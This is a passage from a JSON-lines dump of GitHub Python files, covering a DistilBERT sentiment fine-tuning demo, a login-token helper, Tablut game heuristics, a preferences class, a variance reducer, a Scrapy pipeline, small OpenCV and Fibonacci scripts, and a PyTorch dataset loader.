🤗 Tokenizers.\n# The “Fast” implementations allows a significant speed-up in particular\n# when doing batched tokenization, and additional methods to map between the\n# original string (character and words) and the token space.\n\n# 默认:/Users/liguodong/.cache/huggingface/transformers\n\ntokenizer = AutoTokenizer.from_pretrained(model_checkpoint, cache_dir= \"./temp\",use_fast=True)\n\nprint(tokenizer([\"Hello, this one sentence!\"]))\n# {'input_ids': [[101, 7592, 1010, 2023, 2028, 6251, 999, 102]], 'attention_mask':\n# [[1, 1, 1, 1, 1, 1, 1, 1]]}\n# input_ids: the tokenizer vocabulary indexes of the tokenized input sentence\n# attention_mask: 0 if the corresponding input_id is padding, 1 otherwise\n\n# input_ids:分词输入句子的分词器词汇索引。\n# attention_mask:一个由 1 和 0 组成的数组,其中 0 表示发生填充的位置。\n\n# input_ids 和 attention_mask 都将被输入 DistilBERT 模型中。\n\n\n\ndef preprocess_function_batch(examples):\n # truncation=True: truncate to the maximum acceptable input length for\n # the model.\n return tokenizer(examples[\"text\"], truncation=True)\n\n# batched=True: use this if you have a mapped function which can efficiently\n# handle batches of inputs like the tokenizer\nsplitted_datasets_encoded = splitted_datasets.map(preprocess_function_batch, batched=True)\n\"\"\"\nDatasetDict({\n train: Dataset({\n features: ['text', 'label', 'input_ids', 'attention_mask'],\n num_rows: 17500\n })\n test: Dataset({\n features: ['text', 'label', 'input_ids', 'attention_mask'],\n num_rows: 7500\n })\n})\n\"\"\"\n\n# 现在可以使用 AutoModelForSequenceClassification 类及其 from_pretrained 方法加载预训练的 BERT。\n# 这里要使用num_label = 2 参数,因为现在需要在是二分类任务上微调 BERT,\n# 我们将重新生成的head部分,用一个随机初始化的带有两个标签的分类头替换原始层(其权重将在训练期间学习)\n\n\n\n\n\nfrom transformers import TrainingArguments, Trainer\nfrom transformers import AutoModelForSequenceClassification\n\n# num_labels: number of labels to use in the last layer added to the model,\n# typically for a classification task.\n\n# The 
AutoModelForSequenceClassification class loads the\n# DistilBertForSequenceClassification class as underlying model. Since\n# AutoModelForSequenceClassification doesn't accept the parameter 'num_labels',\n# it is passed to the underlying class DistilBertForSequenceClassification, which\n# accepts it.\n\nmodel = AutoModelForSequenceClassification.from_pretrained(model_checkpoint, num_labels=2, cache_dir= \"./temp\")\n\n# This will issue a warning about some of the pretrained weights not being used\n# and some weights being randomly initialized. That’s because we are throwing\n# away the pretraining head of the BERT model to replace it with a classification\n# head which is randomly initialized. We will fine-tune this model on our task,\n# transferring the knowledge of the pretrained model to it (which is why doing\n# this is called transfer learning).\n\n# 在编写训练代码之前,需要启动 TensorBoard,这样可以获得模型的实时训练信息。\n\n# 启动 TensorBoard 时,logdir 参数应该代表 Hugging Face 写入模型训练日志的目录。\n\nmodel_output_dir = f\"{model_checkpoint}-finetuned-{task}\"\nprint(model_output_dir) # distilbert-base-uncased-finetuned-imdb\n\n# Start TensorBoard before training to monitor it in progress\n# %load_ext tensorboard\n# %tensorboard --logdir '{model_output_dir}'/runs\n\n# 启动时,TensorBoard 面板将显示当前没有可用的仪表板。如果在模型训练期间刷新此页面则会查看到一些实时的数据。\n\n\n# 接下来是配置一些训练参数。代码片段中已经为每个参数添加说明。\n\n# output_dir 存储最终模型的位置。\n# evaluation_strategy和eval_steps每50个训练step在验证集上验证训练模型。\n# logging_strategy 和 logging_steps 每 50 个训练step保存日志(将由 TensorBoard 可视化)。\n# save_strategy 和 save_steps 表示每 200 个训练step保存训练模型。\n# learning_rate 学习率。per_device_train_batch_size 和 per_device_eval_batch_size 分别表示在训练和验证期间使用的批大小。\n# num_train_epochs表示训练的轮次数。\n# load_best_model_at_end 表示在测试集上计算使用性能最好的模型(用 metric_for_best_model 指定)的模型。\n# report_to 将所有训练和验证的数据报告给 TensorBoard。\n\n\nargs = TrainingArguments(\n # output_dir: directory where the model checkpoints will be saved.\n output_dir=model_output_dir,\n # evaluation_strategy (default \"no\"):\n # Possible values are:\n # \"no\": No evaluation is done during training.\n # \"steps\": Evaluation is done (and logged) every eval_steps.\n # \"epoch\": Evaluation is done at the end of each epoch.\n evaluation_strategy=\"steps\",\n # eval_steps: Number of update steps between two evaluations if\n # evaluation_strategy=\"steps\". Will default to the same value as\n # logging_steps if not set.\n eval_steps=50,\n # logging_strategy (default: \"steps\"): The logging strategy to adopt during\n # training (used to log training loss for example). Possible values are:\n # \"no\": No logging is done during training.\n # \"epoch\": Logging is done at the end of each epoch.\n # \"steps\": Logging is done every logging_steps.\n logging_strategy=\"steps\",\n # logging_steps (default 500): Number of update steps between two logs if\n # logging_strategy=\"steps\".\n logging_steps=50,\n # save_strategy (default \"steps\"):\n # The checkpoint save strategy to adopt during training. 
Possible values are:\n # \"no\": No save is done during training.\n # \"epoch\": Save is done at the end of each epoch.\n # \"steps\": Save is done every save_steps (default 500).\n save_strategy=\"steps\",\n # save_steps (default: 500): Number of updates steps before two checkpoint\n # saves if save_strategy=\"steps\".\n save_steps=200,\n # learning_rate (default 5e-5): The initial learning rate for AdamW optimizer.\n # Adam algorithm with weight decay fix as introduced in the paper\n # Decoupled Weight Decay Regularization.\n learning_rate=2e-5,\n # per_device_train_batch_size: The batch size per GPU/TPU core/CPU for training.\n per_device_train_batch_size=16,\n # per_device_eval_batch_size: The batch size per GPU/TPU core/CPU for evaluation.\n per_device_eval_batch_size=16,\n # num_train_epochs (default 3.0): Total number of training epochs to perform\n # (if not an integer, will perform the decimal part percents of the last epoch\n # before stopping training).\n num_train_epochs=1,\n # load_best_model_at_end (default False): Whether or not to load the best model\n # found during training at the end of training.\n load_best_model_at_end=True,\n # metric_for_best_model:\n # Use in conjunction with load_best_model_at_end to specify the metric to use\n # to compare two different models. Must be the name of a metric returned by\n # the evaluation with or without the prefix \"eval_\".\n metric_for_best_model=\"accuracy\",\n # report_to:\n # The list of integrations to report the results and logs to. Supported\n # platforms are \"azure_ml\", \"comet_ml\", \"mlflow\", \"tensorboard\" and \"wandb\".\n # Use \"all\" to report to all integrations installed, \"none\" for no integrations.\n report_to=\"tensorboard\"\n)\n\n# 然后需要将这些训练参数传递给 Trainer 对象, Trainer 对象被实例化就可以使用 train 方法开始训练。\n\n# Function that returns an untrained model to be trained\ndef model_init():\n return AutoModelForSequenceClassification.from_pretrained(model_checkpoint,\n num_labels=2)\n\n# Function that will be called at the end of each evaluation phase on the whole\n# arrays of predictions/labels to produce metrics.\ndef compute_metrics(eval_pred):\n # Predictions and labels are grouped in a namedtuple called EvalPrediction\n predictions, labels = eval_pred\n # Get the index with the highest prediction score (i.e. the predicted labels)\n predictions = np.argmax(predictions, axis=1)\n # Compare the predicted labels with the reference labels\n results = metric.compute(predictions=predictions, references=labels)\n # results: a dictionary with string keys (the name of the metric) and float\n # values (i.e. the metric values)\n return results\n\n# Since PyTorch does not provide a training loop, the 🤗 Transformers library\n# provides a Trainer API that is optimized for 🤗 Transformers models, with a\n# wide range of training options and with built-in features like logging,\n# gradient accumulation, and mixed precision.\ntrainer = Trainer(\n # Function that returns the model to train. It's useful to use a function\n # instead of directly the model to make sure that we are always training\n # an untrained model from scratch.\n model_init=model_init,\n # The training arguments.\n args=args,\n # The training dataset.\n train_dataset=splitted_datasets_encoded[\"train\"],\n # The evaluation dataset. 
We use a small subset of the validation set\n # composed of 150 samples to speed up computations...\n eval_dataset=splitted_datasets_encoded[\"test\"].shuffle(42).select(range(150)),\n # Even though the training set and evaluation set are already tokenized, the\n # tokenizer is needed to pad the \"input_ids\" and \"attention_mask\" tensors\n # to the length managed by the model. It does so one batch at a time, to\n # use less memory as possible.\n tokenizer=tokenizer,\n # Function that will be called at the end of each evaluation phase on the whole\n # arrays of predictions/labels to produce metrics.\n compute_metrics=compute_metrics\n)\n\n# ... train the model!\ntrainer.train()\n\n# 在训练过程中,可以刷新 TensorBoard 来查看训练指标的更新。在本文中,只看到训练集上的损失、验证集上的损失和验证集上的准确率。\n\nimport numpy as np\n\n# Tokenize test set\ndataset_test_encoded = dataset[\"test\"].map(preprocess_function_batch, batched=True)\n# Use the model to get predictions\ntest_predictions = trainer.predict(dataset_test_encoded)\n# For each prediction, create the label with argmax\ntest_predictions_argmax = np.argmax(test_predictions[0], axis=1)\n# Retrieve reference labels from test set\ntest_references = np.array(dataset[\"test\"][\"label\"])\n# Compute accuracy\nmetric.compute(predictions=test_predictions_argmax, references=test_references)\n# {'accuracy': 0.91888}\n\n\n","repo_name":"liguodongiot/nlp-app-samples","sub_path":"tests/transformer/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":12925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13005914557","text":"# -*- coding: UTF-8 -*-\nimport requests\n\n\ndef get_token(name, pw):\n url = \"http://test.api.sso.skytech.cn/login\"\n data = {\n 'name': name,\n 'password': pw,\n 'token': True,\n }\n headers = {\n 'Connection': 'keep-alive',\n 'Accept': '*/*',\n 'Content-Type': \"application/json\",\n 'Accept-Encoding': 'gzip, deflate, br',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',\n }\n response = requests.request(\"POST\", url, json=data, headers=headers)\n if response.status_code == 200 and response.json()['desc'] == \"success\":\n user_token = response.json()['token']\n return user_token\n return print(response.status_code)\n","repo_name":"Gideon0314/web_test","sub_path":"tools/get_token.py","file_name":"get_token.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30930977078","text":"# The engine represents the game algorithm. 
It is responsible for computing the game tree using the minimax algorithm.\n# After the game tree is computed, the engine will return it to pruning.py to be pruned using alpha-beta pruning.\nimport numpy as np\n\nimport Board\n\n\n# Define the heuristic function\ndef heuristic(board, score):\n # the move score is the sum of all the singular scores based on the board state\n move_score = score\n # check if the KING is surrounded by the opponent's pieces (not captured)\n if board.isKingSurrounded():\n move_score += 75*board.nEnemiesCloseToKing()\n # check if the KING is near the throne in the middle of the board\n if board.isKingNearThrone():\n move_score -= 10\n # check if the KING is at the edge of the board (WHITE wins)\n if board.isKingAtEdge():\n move_score -= 10000\n # check if the KING is captured (BLACK wins)\n if board.isKingCaptured():\n move_score += 10000\n # check if the WHITE has more pieces than the BLACK\n if board.getWhitePieces() > board.getBlackPieces():\n move_score -= (board.getWhitePieces() - board.getBlackPieces()) * 2 # multiply by 2 because the BLACK has in the\n # beginning of the game double the number of pieces than the WHITE\n # check if the BLACK has more pieces than the WHITE\n if board.getWhitePieces() < board.getBlackPieces():\n move_score += (board.getBlackPieces() - board.getWhitePieces())\n # sum to move score the number of good moves for the BLACK\n move_score += black_good_moves(board)\n # subtract to move score the number of good moves for the WHITE\n move_score -= white_good_moves(board)*2\n return move_score\n\n\ndef black_good_moves(board):\n # return the number of good moves for the BLACK given the board state\n # every black piece gets assigned a weight score, based on board state, for each quadrant\n # [top left, top right, bottom left, bottom right]\n # the weight score is the following:\n # very good move: 1\n # good move: 0.5\n # not so good move: 0.25\n # then sum all the weighted scores and return the sum\n king = board.getKing()\n king_x = king[0][0]\n king_y = king[1][0]\n weight_score = [0.5, 0.5, 0.5, 0.5]\n # if king is in the top left quadrant\n if king_x < board.getCenterCoordinate() and king_y < board.getCenterCoordinate():\n weight_score = [1, 0.5, 0.5, 0.25]\n # if king is in the top right quadrant\n elif king_x < board.getCenterCoordinate() < king_y:\n weight_score = [0.5, 1, 0.25, 0.5]\n # if king is in the bottom left quadrant\n elif king_x > board.getCenterCoordinate() > king_y:\n weight_score = [0.5, 0.25, 1, 0.5]\n # if king is in the bottom right quadrant\n elif king_x > board.getCenterCoordinate() and king_y > board.getCenterCoordinate():\n weight_score = [0.25, 0.5, 0.5, 1]\n # if king is in the top middle\n elif king_x < board.getCenterCoordinate() and king_y == board.getCenterCoordinate():\n weight_score = [1, 1, 0.25, 0.25]\n # if king is in the bottom middle\n elif king_x > board.getCenterCoordinate() and king_y == board.getCenterCoordinate():\n weight_score = [0.25, 0.25, 1, 1]\n # if king is in the left middle\n elif king_x == board.getCenterCoordinate() and king_y < board.getCenterCoordinate():\n weight_score = [1, 0.25, 1, 0.25]\n # if king is in the right middle\n elif king_x == board.getCenterCoordinate() and king_y > board.getCenterCoordinate():\n weight_score = [0.25, 1, 0.25, 1]\n # if king is in the center\n else:\n weight_score = [0.5, 0.5, 0.5, 0.5]\n # get the black pieces for each quadrant\n black_pieces = np.where(board.getBoard() == 2)\n black_pieces_x = black_pieces[0]\n black_pieces_y = 
black_pieces[1]\n tmp = black_pieces_y[black_pieces_x <= board.getCenterCoordinate()]\n top_right_pieces = len(tmp[tmp >= board.getCenterCoordinate()])\n tmp = black_pieces_y[black_pieces_x <= board.getCenterCoordinate()]\n top_left_pieces = len(tmp[tmp <= board.getCenterCoordinate()])\n tmp = black_pieces_y[black_pieces_x >= board.getCenterCoordinate()]\n bottom_right_pieces = len(tmp[tmp >= board.getCenterCoordinate()])\n tmp = black_pieces_y[black_pieces_x >= board.getCenterCoordinate()]\n bottom_left_pieces = len(tmp[tmp <= board.getCenterCoordinate()])\n # multiply the number of black pieces in each quadrant by the weight score\n top_right_score = top_right_pieces * weight_score[0]\n top_left_score = top_left_pieces * weight_score[1]\n bottom_right_score = bottom_right_pieces * weight_score[2]\n bottom_left_score = bottom_left_pieces * weight_score[3]\n # also add for every black piece canBlackEatFrom(x, y)\n eat_score = 0\n for i in range(len(black_pieces_x)):\n if board.canBlackEatFrom(black_pieces_x[i], black_pieces_y[i]):\n eat_score += 1\n # return the sum of all the weighted scores\n return top_right_score + top_left_score + bottom_right_score + bottom_left_score + eat_score*0.5\n\n\ndef white_good_moves(board):\n # return the number of good moves for the WHITE given the board state (see black_good_moves)\n # good moves for white:\n # 1. try to block or eat the black pieces\n # get the white pieces\n white_pieces = np.where(board.getBoard() == 1)\n white_pieces_x = white_pieces[0]\n white_pieces_y = white_pieces[1]\n # for each white piece, check if it can eat or block a black piece\n # if it can, add 1 to the score for kill 0.75 for block\n score = 0\n for i in range(len(white_pieces_x)):\n x = white_pieces_x[i]\n y = white_pieces_y[i]\n # check if the piece can eat a black piece\n if board.canWhiteEatFrom(x, y):\n score += 1\n # check if the piece can block a black piece\n if board.canWhiteBlockFrom(x, y):\n score += 0.75\n return score\n\n\n","repo_name":"CipStr/Tablut-MALI","sub_path":"heuristics.py","file_name":"heuristics.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14945496063","text":"# *-* coding:utf-8 *-*\nfrom configparser import *\nimport os\n\nfrom util.widgets.TextWidget import *\nfrom util.util import adaptTextColor, setStyleDay\nfrom affichages.gantt.liens.AbstractLink import *\n\n# Dictionnaires de couleurs\nfrom preferences.themes.themeLoader import WIN_COLORS\nfrom PIL.ImageColor import colormap\n\nclass Data(ConfigParser):\n def __init__(self):\n super().__init__(self)\n # Création des attributs\n self.__profilFolder = None\n self.__palette = {\n \"background\" : \"#dedede\",\n \"foreground\" : \"#000000\",\n \"selected\" : \"#91c9f7\",\n \"jour\" : \"#ffffa0\",\n \"highlightedWidget\" : \"#cccccc\",\n \"normalInnerLink\" : \"#808080\", # (= \"grey\" = \"gray\")\n \"addLink\" : \"#ffaf00\",\n \"deleteLink\" : \"#ff3f3f\"\n }\n\n def endInit(self):\n \"\"\"\n Méthode qui doit être appelé pour finir la construction de l'appli\n \"\"\"\n # Donner une référence à data\n TextWidget.giveData(self)\n AbstractLink.giveData(self)\n\n ## Couleur du jour sélectionné\n if self.testDataExist(\"General\", \"Thème\", \"today's color\"):\n couleur = self.getOneValue(\"General\", \"Thème\", \"today's color\")\n else :\n couleur = self.getPalette()[\"jour\"]\n self.changePalette(\"jour\", couleur)\n # Mettre le style d'affichage des jours\n 
setStyleDay(self.getStyleDayPrinting())\n\n \"\" # Marque pour le repli\n ################\n # Utilitaire : #\n ################\n \"\"\n def read(self, fichier, add = False):\n \"\"\"\n On efface ce qu'on avait en mémoire\n et on relit tout\n \"\"\"\n if not add:\n self.clear()\n super().read(fichier, encoding=\"utf-8\")\n\n def readFile(self, nom, lireDef = True, lireCfg = True):\n \"\"\"\n Fonction qui va lire les fichiers de préférences avec Data\n @param nom : nom du fichier à lire (sans l'extension)\n \"\"\"\n self.clear()\n if lireDef and lireCfg:\n self.read(\"Ressources/prefs/\"+nom+\".def\")\n path = self.getProfilFolder() + \"/\" + nom + \".cfg\"\n if os.path.exists(path):\n self.read(path, add=True) # Prise de conscience de ce qu'il y a dedans\n\n # On ne met pas le add sinon\n elif not lireDef and lireCfg:\n path = self.getProfilFolder() + \"/\" + nom + \".cfg\"\n if os.path.exists(path):\n self.read(path) # Prise de conscience de ce qu'il y a dedans\n\n elif lireDef and not lireCfg:\n self.read(\"Ressources/prefs/\"+nom+\".def\")\n\n def sauv(self, fichier):\n \"\"\"\n Écrit dans le fichier puis\n @param fichier : contient le path + nom + extension du fichier dans lequel Data doit écrire\n # Note : une lecture de ce fichier est conseillé avant afin de ne pas supprimer tout le contenu inutilement\n \"\"\"\n with open(fichier, \"w\", encoding=\"utf-8\") as tfile:\n self.write(tfile)\n\n \"\"\n #############\n # Testeur : #\n #############\n \"\"\n def testBool(self, value):\n \"\"\" Test pour savoir si value est un Booléen \"\"\"\n if not isinstance(value, bool):\n raise TypeError(\"Expected a boolean\")\n\n def testDataExist(self, nomFichier, nomSection = None, nomCle = None):\n \"\"\"\n Méthode qui True si la valeur existe dans le fichier et la section indiqué\n @param nomFichier : contient le nom du fichier dans lequel se trouve notre valeur\n @param nomSection : contient le nom de la section dans laquelle se trouve notre valeur\n @param nomCle : contient le nom de la clé pour ainsi obtenir la valeur\n @return : True = la clé existe, False = la clé, la section ou le fichier n'existe pas\n \"\"\"\n self.readFile(nomFichier)\n # Le fichier existe ?\n if nomSection is None and nomCle is None:\n return True if self.sections() != [] else False\n # La section du fichier existe ?\n elif nomSection is not None and nomCle is None:\n return True if nomSection in self.sections() else False\n # J'ai mis la clé mais pas la section, c'est grave ? 
(ERROR)\n elif nomSection is None and nomCle is not None:\n raise ValueError(\"Une clé doit être lié a une section pour être trouvé\")\n # La clé existe dans la section du fichier spécifié ?\n else :\n return True if nomSection in self.sections() and nomCle in self[nomSection] else False\n\n def testString(self, value):\n \"\"\" Test pour savoir si value est un String \"\"\"\n if not isinstance(value, str):\n raise TypeError(\"Expected a string\")\n\n \"\"\n ###########\n # Getters #\n ###########\n \"\"\n def getOneValue(self, nomFichier, nomSection, nomCle):\n \"\"\"\n Méthode qui renvoie une valeur précise\n @param nomFichier : contient le nom du fichier dans lequel se trouve notre valeur\n @param nomSection : contient le nom de la section dans laquelle se trouve notre valeur\n @param nomCle : contient le nom de la clé pour ainsi obtenir la valeur\n @return : la value\n \"\"\"\n if not self.testDataExist(nomFichier, nomSection, nomCle):\n raise ValueError(\"%s n'existe pas dans %s du fichier %s.\\n utiliser la méthode data.testDataExist() pour éviter l'erreur\"%(nomCle, nomSection, nomFichier))\n return self[nomSection][nomCle]\n\n def getPalette(self):\n \"\"\"\n Méthode qui retourne une copie de la palette de couleur\n @return self.__palette.copy()\n \"\"\"\n return self.__palette.copy()\n\n def getProfilFolder(self):\n return self.__profilFolder + \"/\" # au cas où\n\n def getStyleDayPrinting(self):\n \"\"\"\n Getter pour le style d'affichage des jours selon les préférences\n Cette méthode est utilisé par util.util#adaptDate pour rendre toutes les dates jolies\n Utiliser cette méthode permet de passer une seule fois par data, ensuite les valeurs sont stockées dans util\n @return : (, ) : (format de texte, lien)\n \"\"\"\n # Si le fichier n'existe pas :\n if not self.testDataExist(\"Calendrier\"):\n return (\"NA_NM2_NJ\", \".\")\n # On cherche le lien\n if self.testDataExist(\"Calendrier\", \"Calendrier\", \"Lien\"):\n lien = self.getOneValue(\"Calendrier\", \"Calendrier\", \"Lien\")[1]\n else :\n lien = \".\"\n # On cherche le style\n if self.testDataExist(\"Calendrier\", \"Calendrier\", \"sytle d'affichage\"):\n texte = self.getOneValue(\"Calendrier\", \"Calendrier\", \"sytle d'affichage\")\n # On retourne les valeurs :\n return (texte, lien)\n\n\n \"\"\n ###########\n # Setters #\n ###########\n \"\"\n def changePalette(self, cle, value):\n \"\"\"\n Permet de changer une valeur de la palette\n @param cle : contient le nom de la clé\n @param value : couleur au format tkinter\n \"\"\"\n if cle in self.getPalette():\n if value.startswith(\"System\"):\n self.__palette[cle] = WIN_COLORS[value]\n elif value[0] != \"#\":\n self.__palette[cle] = colormap[value.lower()]\n else:\n self.__palette[cle] = value\n else:\n raise ValueError('\"%s\" not in data#__palette')\n def setCurrentTheme(self, style):\n \"\"\"\n Setter pour un nouveau thème et donc change la palette\n @param style : pour récupérer toutes les valeurs adéquates\n \"\"\"\n def couleurAdaptative(native, accentuation, cle):\n \"\"\"\n Fonction embarqué qui permet de mettre une couleur asé sur une autre\n avec une accentuation différence\n @param native : couleur a tester (clair/foncé) et à modifier\n @param accentuation : valeur de l'acctentuation en hexa. 
exemple : \"121212\"\n @param cle : nom de la clé de la nouvelle couleur\n \"\"\"\n # Si c'est clair\n if adaptTextColor(native) == \"#000000\":\n self.changePalette(cle, \"#\" + hex(int(native[1:], 16) - int(accentuation, 16))[2:])\n # Si c'est foncé\n else :\n self.changePalette(cle, \"#\" + hex(int(native[1:], 16) + int(accentuation, 16))[2:])\n\n # On récupère les valeurs pour les mettre dans le dico __palette\n self.changePalette(\"background\", style.lookup(\".\", \"background\"))\n self.changePalette(\"foreground\", style.lookup(\".\", \"foreground\"))\n if style.lookup(\".\", \"selectbackground\") != \"\":\n self.changePalette(\"selected\", style.lookup(\".\", \"selectbackground\"))\n else: # Aquativo n'a pas de couleur de sélection\n self.changePalette(\"selected\", \"#85cafc\")\n\n # Pour les TextWidget\n couleurAdaptative(self.getPalette()[\"background\"], \"121212\", \"highlightedWidget\")\n # Pour les liens\n couleurAdaptative(self.getPalette()[\"background\"], \"555555\", \"normalInnerLink\")\n\n return\n\n def setProfilFolder(self, value):\n \"\"\"\n Setter du path du profil en cours\n @param value : contient le path\n \"\"\"\n self.testString(value)\n self.__profilFolder = value + \"/\" # au cas où\n return\n","repo_name":"Zetrypio/TaskManager","sub_path":"TaskManager/dataManager/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9582,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6664976665","text":"#!/usr/bin/python3\nimport sys\n\n\ndef main():\n acc_size = 0\n acc_mean = 0\n acc_var = 0\n for line in sys.stdin:\n chunk_size, chunk_mean, chunk_var = line.split()\n chunk_size = int(chunk_size)\n chunk_mean = float(chunk_mean)\n chunk_var = float(chunk_var)\n new_size = chunk_size + acc_size\n acc_var = (chunk_size * chunk_var + acc_size * acc_var) / new_size + \\\n chunk_size * acc_size * ((chunk_mean - acc_mean) / new_size) ** 2\n acc_mean = (chunk_size * chunk_mean + acc_size * acc_mean) / new_size\n acc_size += chunk_size\n print(\"{} {} {}\".format(acc_size, acc_mean, acc_var)) \n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sesevasa64/BigData","sub_path":"hw1/block2/var_reducer.py","file_name":"var_reducer.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42723299507","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport json\nimport logging\nimport random\n\n\nclass DianpingProPipeline(object):\n def open_spider(self, spider):\n self.file_path = './data/{}.{}'.format(spider.name,random.randint(100,1000))\n self.file = open(self.file_path, \"w\")\n\n def process_item(self, item, spider):\n dictitem = dict(item)\n self.file.write(json.dumps(dictitem, ensure_ascii=False))\n self.file.write('\\n')\n self.file.flush()\n return item\n\n def close_spider(self, spider):\n logging.info('存储数据成功,本地存储路径:{}'.format(self.file_path))\n self.file.close()\n","repo_name":"Pineapple1996/dianping_pro","sub_path":"dianping_pro/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33511206313","text":"# ch4_1.py\nimport cv2\n\nimg = cv2.imread(\"view.jpg\") # BGR 讀取\ncv2.imshow(\"view.jpg\", 
img)\nimg_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # BGR 轉 RBG\ncv2.imshow(\"RGB Color Space\", img_rgb)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n \n","repo_name":"jumbokh/Computer-Vision","sub_path":"sources/ch4ColorSpace/ch4_1.py","file_name":"ch4_1.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35849967568","text":"print('-' * 25)\r\nprint('Sequência de Fibonacci')\r\nprint('-' * 25)\r\ntermo = int(input('Quantos termos você quer mostrar? '))\r\nt1 = 0\r\nt2 = 1\r\nc = 3\r\nprint(f'{t1} > {t2} >', end=' ')\r\nwhile c <= termo:\r\n t3 = t1 + t2\r\n print(f'{t3} >', end=' ')\r\n t1 = t2\r\n t2 = t3\r\n c += 1\r\nprint('fim')","repo_name":"HebertZanatelli/Python","sub_path":"CursoEmVideo/Exercicios/063.py","file_name":"063.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4743251377","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # write a python program to get the fibonacci series between 0 to 50\n# \n\n# In[3]:\n\n\nstart = int (input(\"enter the starting number for range: \"))\nend = int(input(\"enter the ending number for range: \")) \na = 0\nb = 1\nsum = 0\nprint(\"fibonacci series between\",start, \"to\", end, \"is: \")\nwhile(sum < end):\n a = b\n b = sum\n sum = a + b\n print(b)\nprint(end = \" \") \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Manu31manasa/assignment-1-","sub_path":"Fibnocci series.py","file_name":"Fibnocci series.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37205496187","text":"from collections import Counter\nfrom functools import cached_property\nimport os\nimport sys\nimport pdb\nimport json\nimport random\nfrom typing import List\nimport torch\nimport torch.utils.data as tdata\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom datasets.build import DATASET_REGISTRY, build_dataset\nfrom .prompter.attr import Prompter as Prompter\nfrom models import clipimg_model\n\n\nEXTRA_DIR = {\n # \"CGQA\": \"data/C-GQA\",\n \"VG\": \"data/VG\",\n}\n\n\n\ndef purify_verb(x):\n x = x.strip().lower()\n x = x.replace(\"_\", \" \").replace(\"-\", \" \")\n return x\n\n\n\n@DATASET_REGISTRY.register()\nclass One4AllDataset_Attr(tdata.Dataset):\n def __init__(self, cfg, mode):\n \n self.datasets = {} \n cfg.TRAIN.EXTRA_MASK = \"train:/home/user/lmy/DATA/independent_attr1/train_code/abcd/video_property/One4all_train_100K_sc5.json; val:/home/user/lmy/DATA/independent_attr1/train_code/abcd/video_property/One4all_train_100K_sc5.json\" \n # cfg_TRAIN_EXTRA_MASK = \"train:/home/user/lmy/DATA/independent_attr1/train_code/abcd/configs/One4all_train_10K_sc5.json; val:video_property/ego-o4a/val.json\"\n # train:xxx; val:xxx\n data_mask = cfg.TRAIN.EXTRA_MASK.split(\";\") # cfg.TRAIN.EXTRA_MASK: \"train:xxx; val:xxx\"\n data_mask = [x.split(\":\") for x in data_mask] # data_mask: [[\"train\", \"xxx\"], [\"val\", \"xxx\"]]\n mask_per_ds = {k.strip():v.strip() for k, v in data_mask} # mask_per_ds: {\"train\": \"xxx\", \"val\": \"xxx\"}\n mask_path = mask_per_ds[mode] # mask_path: \"xxx\"\n\n with open(mask_path, \"r\") as fp:\n self.idx_list = json.load(fp) # self.idx_list: [[\"CGQA\", 0], [\"CGQA\": 1], ...] 
\n\n idx_per_dataset = Counter([k for k, _ in self.idx_list]) # idx_per_dataset: Counter({'CGQA': 5637, 'DTD': 4363})\n # pdb.set_trace()\n\n\n for name in idx_per_dataset.keys():\n \n #cfg.DATA.PATH_TO_DATA_DIR = EXTRA_DIR[name] \n cfg_DATA_PATH_TO_DATA_DIR = EXTRA_DIR[name]\n # pdb.set_trace()\n dset = build_dataset(name, cfg, mode) # dset: EpicDataset \n self.datasets[name] = dset # self.datasets: {\"Epic\": EpicDataset, \"FiftySalads\": FiftySaladsDataset, ...}\n # pdb.set_trace()\n print(f\"One4All {mode}\") # print: \"One4All train\"\n for k, v in idx_per_dataset.items():\n print(f\"\\t{k}: {v}\") # print: \"Epic: 100\", \"FiftySalads: 200\", ...\n \n\n # verb-classes stuff\n self.verb2id_o4a = json.load(open(\"/home/user/lmy/DATA/independent_attr1/train_code/abcd/attr2id_vg.json\")) # self.verb2id_o4a: {\"verb1\": 0, \"verb2\": 1, ...}\n self.prompter = Prompter()\n self.num_class = len(set(self.verb2id_o4a.values()))\n self.verb_str_per_id = [[] for _ in range(self.num_class)] # 这一句代码创建了一个包含 self.num_class 个空列表的列表 self.verb_str_per_id。\n \n for k, i in self.verb2id_o4a.items():\n #pdb.set_trace()\n self.verb_str_per_id[i].append(eval(k)) # 一个编号对应多个动词\n # pdb.set_trace()\n # pdb.set_trace()\n # self.prompter 